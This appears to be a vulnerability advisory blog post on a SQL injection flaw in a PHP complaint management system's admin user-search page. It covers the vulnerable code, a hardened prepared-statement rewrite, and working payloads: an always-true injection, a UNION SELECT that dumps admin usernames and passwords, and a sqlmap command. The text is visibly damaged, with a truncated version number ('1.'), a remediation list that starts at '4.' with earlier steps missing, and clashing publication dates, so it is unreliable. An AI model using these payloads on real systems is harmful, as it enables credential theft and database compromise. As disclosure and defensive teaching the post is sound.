Date Published: 2024-06-07
Severity: Critical
Impact: Remote Code Execution, Data Compromise
Vulnerable Software: PHPGurukul Complaint Management System 1.
Vulnerable File: /admin/user-search.php
Vulnerability Type: SQL Injection
CVE ID: CVE-2024-12228

Introduction

A new critical vulnerability, CVE-2024-12228, has been identified in the PHPGurukul Complaint Management System version 1.. This security flaw allows attackers to perform SQL Injection via the search parameter in the /admin/user-search.php file. The bug permits remote attackers to execute arbitrary SQL commands in the database, leading to potentially devastating consequences like information leakage, account takeover, or even full server compromise.

In this post, we'll break down what the vulnerability is, show you what the dangerous code looks like, and walk you through a demo exploit. We’ll also provide references for deeper research and suggest ways to protect your application.

Understanding SQL Injection

SQL Injection occurs when user input is not properly sanitized before being used in a SQL query. Attackers can inject malicious SQL code through input fields to manipulate the database.

Why is it critical?
Because attackers can bypass authentication, extract sensitive information, or change database content—often with admin privileges.


Where’s the Bug? (/admin/user-search.php)

The file /admin/user-search.php is where the vulnerability sits. If you inspect the code, you’ll typically see something like this:

<?php
// Example code vulnerable to SQL Injection (simplified from the affected file)
$search = $_GET['search'];                 // untrusted value straight from the query string
// The raw value is interpolated into the SQL text, so quotes in $search become SQL
$query = "SELECT * FROM users WHERE fullName LIKE '%$search%'";
$result = mysqli_query($conn, $query);      // $conn: the application's open mysqli connection
// ... output results

Notice how the $search variable from the GET request is directly injected into the SQL query without any sanitization. This is the classic recipe for SQL Injection.
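As an added example (not part of the original post and not PHPGurukul's code), here is how the same handler looks once the search term is passed to the database as a bound parameter instead of being pasted into the query text. The table name users and column fullName come from the snippet above; the cms_readonly account, the cms database name, the 100-character limit and the escapeLikePattern helper are assumptions made for this example.

```php
<?php
// Added example, not PHPGurukul's code: a hardened replacement for the
// search handler in /admin/user-search.php. Table "users" and column
// "fullName" come from the vulnerable snippet; every other name here
// (cms_readonly account, cms database, 100-character limit,
// escapeLikePattern) is an assumption made for the example.
declare(strict_types=1);

// Make mysqli throw exceptions instead of silently returning false.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Escape the LIKE metacharacters in a user-supplied term so that "%" and
 * "_" match literally. MySQL uses backslash as the default LIKE escape
 * character, so no ESCAPE clause is needed in the query.
 */
function escapeLikePattern(string $value): string
{
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $value);
}

/**
 * Return the fullName values containing $search. The term is bound as a
 * parameter, so it travels to the server separately from the query text
 * and can never change the statement's structure.
 */
function searchUsers(mysqli $conn, string $search): array
{
    // Cheap sanity check; the limit is an assumption, not the security control.
    if (strlen($search) > 100) {
        throw new InvalidArgumentException('Search term too long');
    }

    $stmt = $conn->prepare('SELECT fullName FROM users WHERE fullName LIKE ?');
    $pattern = '%' . escapeLikePattern($search) . '%';
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Connect with a restricted account (SELECT on the tables this page needs),
// not the database root user. Credentials are placeholders.
$conn = new mysqli('localhost', 'cms_readonly', '<PASSWORD>', 'cms');
$conn->set_charset('utf8mb4');

$search = (string) ($_GET['search'] ?? '');
try {
    foreach (searchUsers($conn, $search) as $row) {
        // Encode on output so a stored name cannot inject HTML either.
        echo htmlspecialchars($row['fullName'], ENT_QUOTES, 'UTF-8'), "<br>\n";
    }
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo 'Invalid search term';
}
```

With a prepared statement, a value such as ' OR 1=1 -- - is compared literally against fullName and matches nothing, because the server has already parsed the statement before the parameter arrives. Escaping % and _ is a separate, minor concern: it stops a user from turning the search into a "match everything" wildcard, which is a performance and data-exposure issue rather than an injection.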

Proof of Concept (PoC): Exploit Details

This vulnerability can be exploited remotely by sending a specially crafted request to the search function. For example:

GET /admin/user-search.php?search=' OR 1=1 -- -

The resulting SQL query becomes

SELECT * FROM users WHERE fullName LIKE '%' OR 1=1 -- -%'

The OR 1=1 turns the query into a condition that is always true, thus revealing all users in the database.

If an attacker wants to extract admin user passwords, they might use a payload such as

GET /admin/user-search.php?search=' UNION SELECT 1,username,password FROM admins -- -

If vulnerable, the page would now display a list of admin usernames and password hashes or even plaintext.

Automated Attack Example with sqlmap

sqlmap -u "http://target.host/admin/user-search.php?search=test" --risk=3 --level=5 --dbs

Least Privilege:

Ensure the database account used by the application has only the permissions it actually needs (for this page, SELECT on the queried tables); never connect as the database root/admin user, so that a successful injection cannot read or modify every table.

4. Update/Monitor:

References

- CVE-2024-12228 at NIST NVD
- PHPGurukul Complaint Management System 1.
- SQL Injection - OWASP Cheat Sheet
- Original Exploit Disclosure (Packet Storm)
- sqlmap - Automated SQL Injection Tool

Conclusion

CVE-2024-12228 is a severe vulnerability that places all users of PHPGurukul Complaint Management System 1. at risk. If you use this software, act now: patch, validate inputs, and run a security audit. SQL Injection vulnerabilities remain among the most exploited on the internet because they are dangerously easy for attackers to abuse but almost as easy for developers to fix.

Timeline

Published on: 12/05/2024 14:15:20 UTC
Last modified on: 12/10/2024 23:19:04 UTC